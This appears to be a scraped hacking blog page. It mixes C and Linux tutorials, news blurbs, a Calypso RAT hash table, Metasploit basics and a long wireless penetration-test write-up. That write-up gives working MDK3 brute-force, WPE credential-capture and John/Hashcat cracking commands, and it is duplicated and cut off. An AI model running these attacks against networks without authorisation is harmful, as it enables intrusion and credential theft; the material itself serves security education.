Friday, May 22, 2020
Structure Part I: The Basics
Today we are going to go through Structures from defining structures to using structures.
Structures are just a collection of different types under one roof (you can even put one type only!). So that means they give you flexibility of grouping different data types (like int, char, or even char[]) under one name.
So let us start with obviously defining a Structure. In `C` we declare a structure as simply as this:-
struct dob {
int day;
int month;
int year;};
1: In the above code segment struct is a keyword which defines structure.
2: Followed by struct keyword (dob) is the name of our structure.
3: Elements of struct are defined inside braces '{}' as we did (int day; etc).
4: After ending brace we place a terminator ';' to end the declaration.
So now you know how to define a structure but how to create its instances now?
To create a variable of our structure we just need to do this:
struct dob date;
This now declares date as a structure variable of type dob.
1: Here 'struct dob' is our above declared structure.
2: date is a variable of type dob.
So ok we have a structure and a variable of that type but how can i access its parts?
well we can access it and assign it so simply like this:-
date.day = 19;date.month = 10;date.year = 1990;
Note here we use the dot (.) operator to access the fields (parts) of our structure.
ok everything looks nice so for but how in the world can i read data into this structure variable? Again no worries its again simple:-
scanf("%d", &date.day);scanf("%d", &date.month);
that was pretty easy but I was wondering how can i print its data?
Just do it like this:-
printf("Day: %d", date.day);printf("Month: %d",date.month);printf("Year: %d", date.year);
Again remember we use dot (.) operator to access members of a structure.
So we now know how to define and declare a structure, how to access its members, how to read data in it, and how to print data of a structure. Oh that was a tough job..!
Now let us put it together in a single C Program.
/***********************************************/Output:
#include <stdio.h>
struct dob {
int day;
int month;
int year;
};
int main(void) {
struct dob date;
date.day = 19;
date.month = 10;
date.year = 1990;
printf("Day is : %d, Month is: %d, and Year is %d\n",
date.day,date.month, date.year);
printf("Enter Day, Month, and Year separated by spaces: ");
scanf("%d %d %d", &date.day,&date.month,&date.year);
printf("Your entered Date is: %d/%d/%d",
date.day,date.month,date.year);
return 0;
}
Day is : 19, Month is: 10, and Year is 1990
Enter Day, Month, and Year separated by spaces: 1 1 2014
Your entered Date is: 1/1/2014
Continue reading
How Cybersecurity Enables Government, Health, EduTech Cope With COVID-19
The advent of the Covid-19 pandemic and the impact on our society has resulted in many dramatic changes to how people are traveling, interacting with each other, and collaborating at work. There are several trends taking place as a consequence of the outbreak, which has only continued to heighten the need for the tightest possible cybersecurity. Tools for Collaboration There has been a
via The Hacker News
via The Hacker News
Related word
Thursday, May 21, 2020
DirBuster: Brute Force Web Directories
"DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;) " read more...Download: https://sourceforge.net/projects/dirbuster
Continue readingWednesday, May 20, 2020
APT Calypso RAT, Flying Dutchman Samples
Reference
Attackers exploit Windows SMB vulnerability CVE-2017-0143 or use stolen credentials to gain access, deploy the custom Calypso RAT and use it to upload other tools such as Mimikatz, EternalBlue and EternalRomance. They move laterally and steal data.
Download
Hashes
| MD5 | SHA256 | SHA1 | Filename | File Tyee | Stage |
|---|---|---|---|---|---|
| aa1cf5791a60d56f7ae6da9bb1e7f01e | d5afa3bfd423ba060207ad025467feaa56ac53d13616ac8782a7f63c9fc0fdb4 | bdd8b9115d1ae536d0ea1e62052485e5ad10761f | MPSSVC.dll | pe dll | Calypso RAT Payload |
| 1e765fed294a7ad082169819c95d2c85 | f6a09372156a8aef96576627a1ed9e57f194b008bb77e32ca29ac89505f933f0 | 60dda7ccd9ae00701046923b619a1b9c33c8e2ac | Wscntfy.exe | pe exe | Calypso RAT Dropper |
| 17e05041730dcd0732e5b296db16d757 | b6c21c26aef75ad709f6c9cfa84bfa15b7ee709588382ce4bc3544a04bceb661 | f3301405d8ad5b160747241d6b2a8d88bf6292e8 | pe exe | Calypso RAT Dropper | |
| 1ed72c14c4aab3b66e830e16ef90b37b | eebff21def49af4e85c26523af2ad659125a07a09db50ac06bd3746483c89f9d | dc0d0a34f107d140d9e47582e17a7fec945403ea | coal.exe | pe exe | Calypso RAT Dropper |
| e24a62d9826869bc4817366800a8805c | c407c3dde18c9b56ed24492ca257d77a570616074356b8c7854a080823f7ee17 | 53791c9e7c41931a6becb999fee4eb7daf9b1a11 | data01.bin | pe dll | Calypso RAT Dropper |
| c9c39045fa14e94618dd631044053824 | ab39301d45045172ad41c9a89210fdc6f0d3f9dccb567fd733b0dbffbfcfbcc3 | 1cda28bc307c09508dbb1f3495a967bbcc29326e | pe exe | Calypso RAT Dropper | |
| 69322703b8ef9d490a20033684c28493 | e6a3b43acdaa824f3280095b10798ea341839f7d43f0460df8989f13c98fa6e0 | f203680d97705d99f92fe9797691be6177f5fd41 | RasCon.dll | pe dll | Calypso RAT Dropper |
| 85ce60b365edf4beebbdd85cc971e84d | 5dfdee5dd680948d19ab4d16df534cf10aca5fa0b157c59659d6517fe897c62f | d9c14f7b6de8e26ae33e41a72ae8e35bb1af4434 | pe exe | Calypso RAT Dropper | |
| 6347e42f49a86aff2dea7c8bf455a52a | 281583aca23f8fd8745dd88a600cbfc578d819859a13957ec022b86c3c1c99f4 | 8b2a81af85590e0e36efc1c05aa4f0600ea21545 | HIDMgr.dll | pe dll | Calypso RAT Dropper |
| cb914fc73c67b325f948dd1bf97f5733 | 0031c7b63c1e1cd36d55f585d97e2b21a13a19858d5a1aa5455e5cc64b41e6e9 | 37ce4d0a3168e3b2f80b3fae38082e68a454aee0 | pe exe | Calypso RAT Dropper | |
| c84df4b2cd0d3e7729210f15112da7ac | 4e8351ddaff18f7df6fcc27a3c75598e0c56d3b406818d45effb4e78616092c2 | 41a0c5a1aad36f405c8755613c732591e3300f97 | mscorsvw.dll | pe dll | Calypso RAT Dropper |
| 5199ef9d086c97732d97eddef56591ec | 511683c8ee62478c2b45be1f782ce678bbe03c4349a1778651414803010b3ee9 | d19a786adc09dff84642f2c2e0386193fa2a914b | dnscache.dll | pe dll | FlyingDutchman |
| 06c1d7bf234ce99bb14639c194b3b318 | a9a82099aa812d0c4025bee2b34f3b34c1d102773e36f1d50648815913dbe03d | 464ab9e11d371bf24de46c98c295d4afe7e957c1 | fromResource.exe | pedll | FlyingDutchman |
| 617d588eccd942f243ffa8cb13679d9c | 0664b09a86ec2df7dfe01a93e184a1fa23df66ea82cab39000944e418ec1f7b2 | 1b043fdcb582ed13cbf7dabcef6527762b5be93c | pe dll | Hussar | |
| 2807236c2d905a0675878e530ed8b1f8 | 314e438198f8cc2ee393c75f8e9f2ebd2b5133fd6f2b7deb1178f82782fc6330 | 2f6fe857632a67e87f4f3631bfa93713ccdf168a | AeLookupMgr.dll | pe dll | Calypso RAT Payload |
| cce8c8ee42feaed68e9623185c3f7fe4 | 38cc404437b936660066b71cc87a28af1995248d6d4c471706eb1dd347129b4b | 9d2235c911b86bb6ad55d953a2f56ea78c5478e5 | AppCert.dll.crt | Calypso RAT Payload | |
| e1a578a069b1910a25c95e2d9450c710 | 413622ded5d344a5a78de4fea22cfdabdeb4cdccf69e9a1f58f668096c324738 | 36087a5b0809dc3f9dc5a77355a88e99af491a88 | RasCfgMan.dll.crt | Calypso RAT Payload | |
| 0d532484193b8b098d7eb14319cefcd3 | f8043d6bfc3e63d8561f7f74e65cb7ff1731577ecf6c7559795d9de21298f0fc | 31f4c6dc6ce78b4e0439b30c830dfd5d9a3fc4fe | RasCfgMan.dll | pe dll | Calypso RAT Payload |
| 974298eb7e2adfa019cae4d1a927ab07 | 0461710e681fd6dc9f1c83b57f94a88cd6df9e6432174cbfdd70dfd24577a0f8 | 41bc37679ce3caeecc176d10b4f8259918e25807 | VirtualUMP.dll.crt | Calypso RAT Payload | |
| 05f472a9d926f4c8a0a372e1a7193998 | 8017923cd8169bf951106f053408b425f1eb310a9421685638ead55bb3823db3 | 8d909bd3450ebe0cffd0cb17b91bc28d23ef5083 | EFSProvider.dll.crt | Calypso RAT Payload | |
| d1a1166bec950c75b65fdc7361dcdc63 | f3f38c097b0cc5337b7d2dbec098bf6d0a3bb4a3e0336e7b1c8af75268a0a49d | 5731350f68a74fb4762c4ea878ecff635588a825 | RasCon.dll | pe dll 64bits assembly | Calypso RAT Payload |
| e3e61f30f8a39cd7aa25149d0f8af5ef | c4dc7519bccc24c53794bf9178e4a4d0823875c34479d01cedbb3e9b10f5c730 | 1b75ea494c3ac171c5177bdcc263b89a3f24f207 | MPSSVC.dll | pe dll | Calypso RAT Payload |
Related links
Tuesday, May 19, 2020
Linux Command Line Hackery Series: Part 2
Welcome back to Linux Command Line Hackery, yes this is Part 2 and today we are going to learn some new skills. Let's rock
Let us first recap what we did in Part 1, if you are not sure what the following commands do then you should read Part 1.
mkdir myfiles # make a directory (folder) with myfiles as name
cd myfiles # navigate to myfiles folder
touch file1 file2 file3 # create three empty files file1, file2, file3
ls -l # view contents of current directory
echo This is file1 > file1 # write a line of text to file1
cat file1 # display contents of file1
echo This is another line in file1 >> file1 # append another line of text to file1
cat file1 # display the modified content of file1
Command: cp
Syntax: cp source1 [source2 ...] destination
Function: cp stands for copy. cp is used to copy a file from source to destination. Some important flags are mentioned below
Flags: -r copy directories recursively
-f if an existing destination file cannot be opened, remove it and try again
Let us make a copy of file1 using the new cp command:
cp file1 file1.bak
what this command is going to do is simply copy file1 to another file named file1.bak. You can name the destination file anything you want.
Say, you have to copy file1 to a different folder maybe to home directory how can we do that? well we can do that like this:
cp file /home/user/
I've used the absolute path here you can use whatever you like.
[Trick: ~ has a special meaning, it stands for logged in user's directory. You could have written previous command simply asNow you want to create a new directory in myfiles directory with the name backup and store all files of myfiles directory in the backup directory. Let's try it:
cp file1 ~/
and it would have done the same thing.]
mkdir backup
cp file1 file2 file3 backup/
this command will copy file1 file2 file3 to backup directory.
We can copy multiple files using cp by specifying the directory to which files must be copied at the end.
We can also copy whole directory and all files and sub-directories in a directory using cp. In order to make a backup copy of myfiles directory and all of it's contents we will type:
cd .. # navigate to previous directory
cp -r myfiles myfiles.bak # recursively copy all contents of myfiles directory to myfiles.bak directory
This command will copy myfiles directory to myfiles.bak directory including all files and sub-directories
Command: mv
Syntax: mv source1 [source2 ...] destination
Function: mv stands for move. It is used for moving files from one place to another (cut/paste in GUI) and also for renaming the files.
If we want to rename our file1 to file1.old in our myfiles folder we'll do the follow:
cd myfiles # navigate first to myfiles folder
mv file1 file1.old
this command will rename the file1 to file1.old (it really has got so old now). Now say we want to create a new file1 file in our myfiles folder and move the file1.old file to our backup folder:
mv file1.old backup/ # move (cut/paste) the file1.old file to backup directory
touch file1 # create a new file called file1
echo New file1 here > file1 # echo some content into file1
Command: rmdir
Syntax: rmdir directory_name
Function: rmdir stands for remove directory. It is used for removing empty directories.
Let's create an empty directory in our myfiles directory called 'garbage' and then remove it using rmdir:
mkdir garbage
rmdir garbage
Good practice keep it doing. (*_*)
But wait a second, I said empty directory! does it mean I cannot delete a directory which has contents in it (files and sub-directories) with rmdir? Yes!, you cannot do that with rmdir.
So how am I gonna do that, well keep reading...
Command: rm
Syntax: rm FILE...
Function: rm stands for remove. It is used to remove files and directories. Some of it's important flags are enlisted below.
Flags: -r remove directories and their contents recursively
-f ignore nonexistent files and arguments, never prompt
Now let's say we want to delete the file file1.old in backup folder. Here is how we will do that:
rm backup/file1.old # using relative path here
Boom! the file is gone. Keep in mind one thing when using rm "IT IS DESTRUCTIVE!". No I'm not yelling at you, I'm just warning you that when you use rm to delete a file it doesn't go to Trash (or Recycle Bin). Rather it is deleted and you cannot get it back (unless you use some special tools quickly). So don't try this at home. I'm just kidding but yes try it cautiously otherwise you are going to loose something important.
Did You said that we can delete directory as well with rm? Yes!, I did. You can delete a directory and all of it's contents with rm by just typing:
rm -r directory_name
Maybe we want to delete backup directory from our myfiles directory, just do this:
rm -r backup
And it is gone now.
Remember what I said about rm, use it with cautious and use rm -r more cautiously (believe me it costs a lot). -r flag will remove not just the files in directory it will also remove any sub-directories in that directory and there respective contents as well.
That is it for this article. I've said that I'll make each article short so that It can be learned quickly and remembered for longer time. I don't wanna bore you.
More info
- Hacking Etico Certificacion
- Curso De Hacking Gratis
- Rfid Hacking
- Nfc Hacking
- Curso Ethical Hacking
- Curso De Hacker Gratis Desde Cero
- Curso Seguridad Informatica
- Hacker Etico
- Mindset Hacking Nacho
- Growth Hacking Instagram
- Hacking Growth Pdf
- Aprender Hacking
- Hacking Microsoft
- Que Hace Un Hacker
- Hacking Gif
BASICS OF METASPLOIT – BASIC COMMANDS OF METASPLOIT
Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. Here I am going to discuss the basics of Metasploit. I am not covering attacks in this article, as I am just making sure to share the basics of Metasploit and basic commands of Metasploit. So, we can get back to cover attacks of Metasploit in the next articles.
BASICS OF METASPLOIT
The Metasploit framework has three types of working environments.
- msfconsole
- msfcli interface
- msfweb interface
However, the most preferred and used is the 'msfconsole'. It's a very efficient command-line interface that has its own set of commands and system's working environment.
First of all, it's most important to know and understand all the useful commands of Metasploit that are going to be used.
BASIC COMMANDS OF METASPLOIT
Metasploit have a huge number of command that we can use in different type of attacks, but I am just going to share the most used and useful commands here that a beginner can easily understand and follow 'em.
- help (It will give the basic commands you need to launch an exploit.
- search (Finds out the keywords in the selected attack method).
- show exploits (Shows list of an available exploit in the selected option).
- show payloads (It lists all the payloads available).
- show options (It helps you to know all the options if you might have forgotten one).
- info (This is used to get information about any exploit or payload).
- use (It tells Metasploit to use the exploit with the specified name).
- set RHOST (Sets the address of specified remote host).
- set RPORT (Sets up a port that connects to on the remote host).
- set PAYLOAD (It sets the payload that gives you a shell when a service is exploited).
- set LPORT (Sets the port number that the payload will open on the server when an exploit is exploited).
- exploit (It actually exploits the service).
- rexploit (Reloads your exploit code and then executes the exploit without restarting the console).
These are the most used Metasploit commands which come in handy in most of the situations during any sort of attack. You must give all the commands a try and understand 'em how it works and then move to the next part of designing an attack.
Continue reading
Monday, May 18, 2020
Improper Microsoft Patch For Reverse RDP Attacks Leaves 3rd-Party RDP Clients Vulnerable
Remember the Reverse RDP Attack—wherein a client system vulnerable to a path traversal vulnerability could get compromised when remotely accessing a server over Microsoft's Remote Desktop Protocol? Though Microsoft had patched the vulnerability (CVE-2019-0887) as part of its July 2019 Patch Tuesday update, it turns out researchers were able to bypass the patch just by replacing the backward
via The Hacker News
via The Hacker News
Related word
Wireless Scenarios Part 1: EAP-Radius JTR Hashcat, SSID MAC Issues And More
Intro:
I have been on a number of wireless engagements again lately and much like the wireless blog i wrote over a year ago i am trying various combinations of techniques and tools in conjunction to gain access to networks. I will show a range of tools and techniques mostly as a reminder to myself. The format will be scenario based on what i have been seeing while testing. Some of these tools include JTR/Hashcat with specialized rulesets, mdk3 for SSID/MAC bruteforcing, evil access points for bypassing guest networks, DNS redirection/tunneling as well as radius-wpe attacks etc... This will be a 2 part blog, first blog being more Pre-Auth attacks and the second blog being more client attacks.
Finding Hidden SSID's and Limited user network attacks:
Recently i have been on a lot of tests where administrators think its a wonderful idea to hide their SSID's. Administrators feel that if they hide their SSID's they are magically secure. While Cloaked SSID's may pose a slight problem it's not a security feature. Especially when hiding WEP encrypted networks. One issue that keeps coming up is hidden networks with NO clients thus no probe request/response traffic available to passively capture an SSID. Without clients you can't de-authenticate and force reconnections requests with SSID's. To top that off administrators are also running another trivial security feature known as MAC filtering. While MAC filtering is also easy to bypass, again there are no clients on the network so we must come up with strategies to figure out both the SSID's and the possible client MAC addresses. Lets start by addressing the SSID issue.
SSID's can generally be seen in the Beacon traffic. However, if MAC cloaking or hidden SSID's are enabled on your access point they are stripped from the beacon traffic. Striping the beacons of SSID's is usually not a problem if there are clients looking to join the network. As the SSID's must be sent in probe traffic to successfully inquire about joining the network, and SSID's are than easily obtained. Thus why tools like kismet can passively discover the correct SSID given a bit of time and a few clients probing for the hidden network. But, what happens if there is no client traffic?
So the actual scenario i was presented with recently was a Cloaked SSID on a limited use network running WEP, which had a MAC filtered client device. This device would attach to the network once a day for a limited amount of time. So the first piece of the puzzle would be figuring out the SSID for later use then tackling the rest of the problem.
We start with a nice little tool called MDK3 which can be used to send out mass SSID requests in either dictionary style or bruteforce in order to determine an SSID. Lets start with the simple syntax then get into some more fine tuned strategies for determining SSID's based on the mind of the sysadmin.
There are 2 modes i have been using, one is dictionary mode and the other bruteforce mode, i would always start with dictionary because its faster. If a dictionary gives no resultes then move to bruteforce techniques. Also have your Airodump-ng/Kismet running during the attack and if the SSID is found it should apear in there as well as your MDK3 results window. You can get your target BSSID value from airodump along with useful information sometimes regarding length of a hidden SSID value which can be used in fine tuning bruteforcing. MDK3 will automatically pick the correct length and then begin bruteforcing based on that length value:
Below is an example of SSID Length Output:
CH 6 ][ Elapsed: 8 s ][ 2012-03-01 21:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:A5:6F:2E:D5 -59 5 0 0 5 54 WEP WEP length: 12
00:1A:A1:05:E8:20 -61 2 0 0 3 48 . WEP WEP length: 1
00:24:A5:6F:37:9F -64 2 0 0 5 54 WEP WEP length: 12
You will notice example output above says that one SSID is of length 12 and another is of length 1, these are the SSID perceived length values based on values in the packet capture. Not always accurate because these values are just Null place holder values and not always set accurately. Essentially one SSID packet above has a one null value while the other packet has 12 null values as placeholders. If a length of 1 is present you may have to start at 1 and go through the whole range of brute forcing. If the length is known then you can start and end at 12 in this case shortening the full bruteforce time considerably.
Attack Modes and Info:
Dictionary Mode:
./mdk3 [Interface] p -c 1 -t [BSSID] -f [dictionary] -s 100
Bruteforce mode:
./mdk3 [Interface] p -c 1 -t [BSSID] -b u -s 100
Above Switch mappings are defined as the following:
b = bruteforce also can add a character set b [charset]
s = packet speed
c = channel
f = ssid dictionary file
I first tried a regular dictionary attack of common words:
ficti0n:# mdk3 mon0 p -c 1 -t 00:01:55:B1:A3:A5 -f english.txt
channel set to: 1
SSID Wordlist Mode activated!
Waiting for beacon frame from target...
Sniffer thread started
Found SSID length 1, usually a placeholder, no information about real SSIDs length available.
Trying SSID:
Packets sent: 1 - Speed: 1 packets/sec
Got response from 03:F0:9F:17:08:32, SSID: "Secure_Access"
Last try was: (null)
Trying SSID: beauty
Packets sent: 167 - Speed: 166 packets/sec
Got response from 03:F0:9F:17:08:33, SSID: "Guest_Access"
Last try was: (null)
Trying SSID: bianca
Trying SSID: winnie
Trying SSID: isabella
Trying SSID: sierra
Trying SSID: 00000000
Trying SSID: dancer1
Packets sent: 32507 - Speed: 376 packets/sec
Got response from 00:3B:10:47:33:32, SSID: "wow"
I began with a dictionary against a network address i got from my initial airodump-ng. On my first MDK3 run i found one new access point named "wow" but i didnt find the target AP's SSID. If you look at the above MDK3 output there are 2 other networks with similar formats which may reflect our target networks format. Below you will see a similar format.
If the target company has a repeating SSID format we can create our own dictionary file. According to the above output the format is [Word]_Access, we can take advantage of this by creating a new list with python using the company format. Break open your python editor and create a quick script to parse the english dictionary in the proper format for our attack by uppercasing every dictionary word and appending the word "Access".
#--------------------------------------------------------------
#!/usr/bin/python
dictionary = open("rockyou-75.txt", "r")
SSID_List = open("SSID_List.txt", "a")
for word in dictionary:
word = str.capitalize(word) + "Access"
SSID_List.write(word)
SSID_List.close()
dictionary.close()
#----------------------------------------------------------------
I then ran MDK3 again with my modified list. When this was done I then was able to get a response from MDK3 and determine the SSID of the target network, shown below.
Got response from 00:01:55:B1:A3:A5, SSID: "Secret_Access"
Luckily i didn't have to resort to a true bruteforce attack although the format is shown above for completeness.
MDK3 MAC address Bruteforce:
The next issue is that of determining a valid MAC address on a network without any known clients, this can also be done with MDK3 and bruteforce mode. I would suggest looking at other client MAC addresses on the guest or corporate networks as a starting point. Then use those vendor startpoints as your bruteforce values. So if for example you know a bit about the company based on other network MAC values you can use this knowledge in your brute forcing with the -f switch. Below is a basic command ouput for bruteforcing MAC address filters.
ficti0n:# mdk3 mon0 f -t
Mdk3 -fullhelp output:
--------------------------------------------------------------
MAC filter bruteforce mode
This test uses a list of known client MAC Adresses and tries to
authenticate them to the given AP while dynamically changing
its response timeout for best performance. It currently works only
on APs who deny an open authentication request properly
-t
Target BSSID
-m
Set the MAC adress range to use (3 bytes, i.e. 00:12:34)
Without -m, the internal database will be used
-f
Set the MAC adress to begin bruteforcing with
(Note: You can't use -f and -m at the same time)
I wasn't aware of the above technique at the time of testing but i did give it a try on a local Access Point and found a useable mac address under contrived scenarios. So this was worth noting as I found almost zero mention of it when searching around. Also note that some access points do not properly handle the authentication scenarios in which case the above technique will not work correctly. Usually the user sends an auth request and then the AP sends an auth response denoting success or failure along with an error code, but MAC filering is not part of the normal standard so results will vary regarding error codes. This is AP functionality independent. When it does work it gives you a little smily face and says it found a useable MAC address [SHOWN ABOVE] . Unfortunately in my penetration test I was stuck waiting for a client to come online to get a useable MAC address. Below are a few ideas for the rest of the scenario.
Depending on the location and use of the limited connectivity device there are a few options available for retrieving the WEP key. Networks with hidden SSID's have clients who are always probing for hidden networks whether onsite or remote. You could attack a client directly via a Cafe Latte attack. A Caffe Latte attack woud attack a client with a fake access point and gratuitas ARP requests to discover the WEP key of "Secret_Access" by flooding the client with ARP requests it responds to, generating enough traffic to derive the WEP key. This technique is useful now that you know the SSID, especially if the device is being used at the local coffee shop. I will take a look at this attack in the next blog when focusing on client based attacks.
Caffe Latte was not a good option for me because the device appears online for a short period of time and might not be available either offsite at a coffee shop or even locally long enough to generate enough traffic to crack the network. In this test I however didn't have enough time to see client actually get online but had I see the client get online I would have noted his MAC address and then configured a chop chop or fragmentation attack against the network whether the client was available or not all i would really need is one data packet. I will not illustrate this whole technique as it is fully covered in the following link Cracking WEP with no Clients.
Cracking Radius /PEAP/TTLS Hashes: (Post EAP Attack)
This is about attacking hashes from WPE Radius attacks, but just as a reference before we start here is a quick radius attack setup guide without going into to much detail.
Steps to Setup WPE attack
Use one of your local computers to connect to the FreeRadius wireless network and type in a fake username/password to grab an example hash. If you dont see your hash output in the logfile then double check all your ip addresses and insure your server is running. In a real attack you would wait for clients to attach to your Access point and the credentials will be forwarded to your FreeRadius-WPE server. Once this is done the fun begins and also where we will start in our attack scenario.
Formatting hashes:
Your hashes can come in a few formats, they might come back as PAP responses in which case they will be plain text passwords. Plaintext PAP can sometimes be a result of mobile devices sending paswords. Otherwise your attack will result in MSChap password challenge/response hashes. Once you receive your MSChap hashes they have to be formated in a specific way in order to crack them. Here is an example hash and the proper format to use before trying to crack the hashes.
Example Hash:
mschap: Mon Feb 05 19:35:59 2012
username: test
challenge: b3:f8:48:e9:db:02:22:83
response: 15:36:d7:e9:da:43:1f:5f:d2:4b:51:53:87:89:63:b7:12:26:7c:a8:f7:ea:9c:26
Formated for john:(username::::response:challenge)
test::::1536d7e9da431f5fd24b5153878963b712267ca8f7ea9c26:b3f848e9db022283
Tool to automate this: (Tool Link)
One of my friends wrote a python script that will take your freeradius-server-wpe.log as input and format out all of the hashes one per line.. The script output can be fed directly into John The Ripper(JTR).
JTR Cracking and Custom Rulesets:
One way to crack these hashes is to use JTR with a bunch of dictionary attacks and if that fails procede from there with custom korelogic rulesets. Check out preceding link for more info on password cracking techniques which can be employed in addition to this blog. Below I will reiterate a few points on setting up JTR with custom rulesets from the Defcon challenge in 2010 based on the previous link and then how to parse them out and use them.
The first thing to note is that the format of the hashes you get from WPE will generally be considered NETNTLM within JTR so we will have to specify that as well as the wordlists we would like to use to start.
Dictionary attacking first:
First go into your JTR directory and try to crack with some dictionaries of your choosing:
ficti0n:# cd Desktop/Tools\ /john/run
ficti0n:# ./john --wordlist=wordlists/wpa.txt --format=NETNTLM JohnFormat.txt
Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
test (test)
guesses: 1 time: 0:00:00:00 100.00% (ETA: Tue Mar 20 19:29:31 2012) c/s: 692441 trying: test
Custom Rules: korelogic rulesets (Link)
If the cracking fails on all of your wordlists then try installing custom rulesets with the following sequence of commands meant do download and then append the rules to the current john file. The following command can also be found at the above Korelogic link.
ficti0n:# wget http://contest-2010.korelogic.com/rules.txt
ficti0n:# cat rules.txt >> john.conf
Once this is done you can directly specify any rule in the file similar to the following:
ficti0n:# ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:KoreLogicRulesAppendNum_AddSpecialEverywhere johnFormat.txt
Or if you are time independent just let them all rip and go on vacation and check the results when you get back LOL
ficti0n:# for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --wordlist=wordlists/english.txt --format=NETNTLM --rules:${ruleset} JohnFormat.txt; done
Hashcat rulesets and building pasword files:
Another way to build complex password files is to use tools like HashCat with supplied password rules and pipe it out to STDOut, either into a file or the STDIn of other cracking programs like John the Ripper. There is a rules folder in HashCat which has a number of rules provided by default.
Available Hashcat Rules:
ficti0n:# ls
best64.rule generated.rule passwordspro.rule T0XlC.rule toggles3.rule
combinator.rule leetspeak.rule perfect.rule toggles1.rule toggles4.rule
d3ad0ne.rule oscommerce.rule specific.rule toggles2.rule toggles5.rule
Creating Passwords with Hashcat and a dictionary:
ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/cain.txt --stdout
You can also pipe passwords directly into JTR from hashcat output but its really slow so I suggest you make a world list then load it up with --wordlist, but the example is shown below.
Piping Hashcat password rules into JTR: (really slow)
ficti0n:# ./hashcat-cli32.bin -r rules/passwordspro.rule ../wordlists/rockyou-75.txt --stdout |/pentest/passwords/john/john --format=NETNTLM JohnFormat.txt --stdin
I hope someone finds my above notes useful, I am going to write up some client side attack stuff as well and post it up here... Let me know if you have any questions or need more clarification on anything covered in the blogs.
I have been on a number of wireless engagements again lately and much like the wireless blog i wrote over a year ago i am trying various combinations of techniques and tools in conjunction to gain access to networks. I will show a range of tools and techniques mostly as a reminder to myself. The format will be scenario based on what i have been seeing while testing. Some of these tools include JTR/Hashcat with specialized rulesets, mdk3 for SSID/MAC bruteforcing, evil access points for bypassing guest networks, DNS redirection/tunneling as well as radius-wpe attacks etc... This will be a 2 part blog, first blog being more Pre-Auth attacks and the second blog being more client attacks.
Finding Hidden SSID's and Limited user network attacks:
Recently i have been on a lot of tests where administrators think its a wonderful idea to hide their SSID's. Administrators feel that if they hide their SSID's they are magically secure. While Cloaked SSID's may pose a slight problem it's not a security feature. Especially when hiding WEP encrypted networks. One issue that keeps coming up is hidden networks with NO clients thus no probe request/response traffic available to passively capture an SSID. Without clients you can't de-authenticate and force reconnections requests with SSID's. To top that off administrators are also running another trivial security feature known as MAC filtering. While MAC filtering is also easy to bypass, again there are no clients on the network so we must come up with strategies to figure out both the SSID's and the possible client MAC addresses. Lets start by addressing the SSID issue.
SSID's can generally be seen in the Beacon traffic. However, if MAC cloaking or hidden SSID's are enabled on your access point they are stripped from the beacon traffic. Striping the beacons of SSID's is usually not a problem if there are clients looking to join the network. As the SSID's must be sent in probe traffic to successfully inquire about joining the network, and SSID's are than easily obtained. Thus why tools like kismet can passively discover the correct SSID given a bit of time and a few clients probing for the hidden network. But, what happens if there is no client traffic?
So the actual scenario i was presented with recently was a Cloaked SSID on a limited use network running WEP, which had a MAC filtered client device. This device would attach to the network once a day for a limited amount of time. So the first piece of the puzzle would be figuring out the SSID for later use then tackling the rest of the problem.
We start with a nice little tool called MDK3 which can be used to send out mass SSID requests in either dictionary style or bruteforce in order to determine an SSID. Lets start with the simple syntax then get into some more fine tuned strategies for determining SSID's based on the mind of the sysadmin.
There are 2 modes i have been using, one is dictionary mode and the other bruteforce mode, i would always start with dictionary because its faster. If a dictionary gives no resultes then move to bruteforce techniques. Also have your Airodump-ng/Kismet running during the attack and if the SSID is found it should apear in there as well as your MDK3 results window. You can get your target BSSID value from airodump along with useful information sometimes regarding length of a hidden SSID value which can be used in fine tuning bruteforcing. MDK3 will automatically pick the correct length and then begin bruteforcing based on that length value:
Below is an example of SSID Length Output:
CH 6 ][ Elapsed: 8 s ][ 2012-03-01 21:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:A5:6F:2E:D5 -59 5 0 0 5 54 WEP WEP length: 12
00:1A:A1:05:E8:20 -61 2 0 0 3 48 . WEP WEP length: 1
00:24:A5:6F:37:9F -64 2 0 0 5 54 WEP WEP length: 12
You will notice example output above says that one SSID is of length 12 and another is of length 1, these are the SSID perceived length values based on values in the packet capture. Not always accurate because these values are just Null place holder values and not always set accurately. Essentially one SSID packet above has a one null value while the other packet has 12 null values as placeholders. If a length of 1 is present you may have to start at 1 and go through the whole range of brute forcing. If the length is known then you can start and end at 12 in this case shortening the full bruteforce time considerably.
Attack Modes and Info:
Dictionary Mode:
./mdk3 [Interface] p -c 1 -t [BSSID] -f [dictionary] -s 100
Bruteforce mode:
./mdk3 [Interface] p -c 1 -t [BSSID] -b u -s 100
Above Switch mappings are defined as the following:
b = bruteforce also can add a character set b [charset]
s = packet speed
c = channel
f = ssid dictionary file
I first tried a regular dictionary attack of common words:
ficti0n:# mdk3 mon0 p -c 1 -t 00:01:55:B1:A3:A5 -f english.txt
channel set to: 1
SSID Wordlist Mode activated!
Waiting for beacon frame from target...
Sniffer thread started
Found SSID length 1, usually a placeholder, no information about real SSIDs length available.
Trying SSID:
Packets sent: 1 - Speed: 1 packets/sec
Got response from 03:F0:9F:17:08:32, SSID: "Secure_Access"
Last try was: (null)
Trying SSID: beauty
Packets sent: 167 - Speed: 166 packets/sec
Got response from 03:F0:9F:17:08:33, SSID: "Guest_Access"
Last try was: (null)
Trying SSID: bianca
Trying SSID: winnie
Trying SSID: isabella
Trying SSID: sierra
Trying SSID: 00000000
Trying SSID: dancer1
Packets sent: 32507 - Speed: 376 packets/sec
